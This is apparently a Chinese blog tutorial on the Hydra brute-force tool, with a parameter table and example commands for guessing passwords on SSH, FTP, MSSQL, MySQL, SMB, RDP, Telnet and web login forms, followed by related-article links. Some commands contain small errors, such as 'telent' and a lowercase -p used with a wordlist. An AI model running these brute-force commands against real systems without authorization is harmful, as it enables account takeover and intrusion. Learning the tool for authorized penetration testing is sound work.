爆破神器 Hydra 的使用
爆破神器 Hydra 的使用
Hydra 是我在内网渗透中破解 mssql,mysql,ssh,ftp,smb 等账号密码常用的一款工具。
它的功能十分强大,支持很多协议的破解甚至于可以破解没有验证码的web登录。
下载地址:
Windows:https://github.com/maaaaz/thc-hydra-windows
Linux:https://github.com/vanhauser-thc/thc-hydra(这款工具在 kali Linux 中自带)
常用参数详解:
| -R | 根据上一次的进度继续破解 |
|---|---|
| -I | 忽略现有的恢复文件(不要等待 10 秒) |
| -S | 使用SSL协议连接 |
| -s | 指定服务端口(如果端口不是默认的话使用) |
| - l | 指定用户名,-L 指定用户名字典 |
| -p | 指定密码,-P 指定密码字典 |
| -x | 密码暴力生成,键入“-x - h" 获取帮助 |
| -y | 禁止在暴力破解中使用符号 |
| -e ns | n:空密码试探 s:使用指定用户和密码试探 |
| -u | 围绕用户循环,而不是密码(有效! 用 -x 暗示) |
| -C | 用户名可以用 : 分隔(username:password) 可以代替 -l username -p password |
| -M | 指定目标列表文件一行一条 |
| -o | 指定结果输出文件 |
| -b | 指定结果输出文件的格式(默认为:txt) |
| -f / -F | 在使用 -M 参数以后,找到第一对登录名和密码后停止爆破 |
| -t | 指定多线程数量(默认为 16 个线程) |
| -T | 指定多线程的并发数量(默认为 64) |
| -w / -W | 设置最大超时的时间,单位秒(默认是30s) |
| -c | 设置每次登录尝试的等待时间 |
| -4 / -6 | 使用 IPv4(默认)/IPv6 地址 |
| -v / -V / -d | 详细模式 / 每次尝试显示登录 + 通行证 / 调试模式 |
| -O | |
| -q | 不打印有关连接错误的消息 |
| -U | 服务模块使用详情 |
| -h | 更多命令行选项 (COMPLETE HELP) |
常用服务爆破示例
SSH
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 1 -vV -e ns -f 192.168.0.25 ssh
FTP
hydra -l 用户名 -P 密码字典 -vV -e ns IP地址 ftp
MSSQL
hydra -l administrator -P 密码字典 -vV -e ns IP地址 mssql
MYSQL
hydra -l administrator -P 密码字典 -vV -e ns IP地址 mysql
SMB
hydra -l administrator -P 密码字典 -vV -e ns IP地址 smb
RDP
hydra -l administrator -P 密码字典 -vV -e ns IP地址 rdp
TELENT
hydra -l administrator -P 密码字典 -vV -e ns IP地址 telent
爆破web登录
get方式提交
hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
https破解
hydra -m /index.php -l admin -P password.txt 192.168.0.132 https
爆破神器 Hydra 的使用相关推荐
- Kali Linux 下渗透测试 | 3389 批量爆破神器 | hydra | 内网渗透测试
kali linux 下渗透测试,3389 批量爆破神器 hydra -M target.txt rdp -L userlist.txt -P passwordlist.txt -V root@kal ...
- 在线密码破解教程,web登录爆破(hydra的简单使用)
hydra是一个极其强大的在线破解密码的工具(爆破神器) --本文献给无聊的计算机系大学生们 密码破解从大类来分可以分为两种,一种是在线破解,这种方hydra式一般要求待破解的对象对我们来说是可以正常 ...
- 爆破密码-hydra
一.介绍 hydra是一个自动化的爆破工具,暴力破解弱密码,支持众多协议,已经集成到KailLinux中,直接在终端打开即可. hydra支持的服务有:POP3,SMB,RDP,SSH,FTP,POP ...
- 穷举爆破工具hydra
穷举爆破工具hydra 帮助 -R 继续从上一次进度接着破解. -S 采用SSL链接. -s PORT 可通过这个参数指定非默认端口. -l LOGIN 指定破解的用户,对特定用户破解. -L FIL ...
- Hydra—密码爆破神器
公司邮箱系统密码复杂度规则:字母大小写.数字.特殊字符,四选三,长度8位以上.这种复杂度的密码看着是比较安全的,但因历史原因,邮箱系统开放了外网登陆权限,加之公司人数众多,必然会有少量员工把自己的密码 ...
- 【经验分享】Hydra(爆破神器)使用方法
这个也是backtrack下面很受欢迎的一个工具 参数详解: -R 根据上一次进度继续破解 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码破解 ...
- hydra mysql 爆破_Hydra(爆破神器)使用方法
文本框 textarea 动态显示行数(简单文本编辑器) 工作需求做一个文本编辑器简单的. 右边输入文字,左边会显示相应的代码行.清空也会变为1. 废话不多说上代码,自己理解. python中set使 ...
- Ffuf爆破神器(超详细)
目录 为什么是Ffuf 基本使用 最基本的使用 多个字典同时使用 带cookie扫描(-b) 静默模式(-s) 递归扫描(-recursion) 指定扩展名(-e) POST请求爆破 方式1:指明请求 ...
- nmap与hydra
[1]nmap命令 [2]hydra命令 [3]crunch密码字典生成工具 [1]nmap命令 Nmap是主机扫描工具,他的图形化界面是Zenmap,分布式框架为Dnamp. Nmap可以完成以下任 ...
- 渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的 ): 英文文档:https://nmap.org/book/man.html 中文文档:https://nmap.org/ ...
最新文章
- 干货 | 阿里巴巴混沌测试工具ChaosBlade两万字解读
- 在Swift中如何使用C中的Struct
- VMware15虚拟机安装教程
- 你眼泪的味道,我知道!
- 华为HCIE实验考试险过,考试真题分享、答题经验分享
- NETSH WINSOCK RESET这条命令的含义和作用?
- linux wait 子孙进程,Linux-进程基础
- 再谈WinRT自定义组件的开发
- python基于django的高校教师科研成果管理系统
- 三星linux电视软件下载中心,Samsung Smart View下载-Samsung Smart View免费版-最火软件站...
- 网易通行证html代码,JavaScript实现仿网易通行证表单验证
- YUY2和MJPG视频编码格式区别
- micropython stm32f107_stm32f107 USART3数据接收错误问题
- 习题4-9 打印菱形图案 (15 分)
- 英文学术论文写作——模式识别方向(笔记)
- 唯品会获得vip商品详情 API 返回值说明
- NAND、NOR、FLASH、Memory
- GD32F130 使用ST库开发项目
- 墙角下的toLowerCase()
- 虚拟机安装完ghost系统后找不到操作系统的原因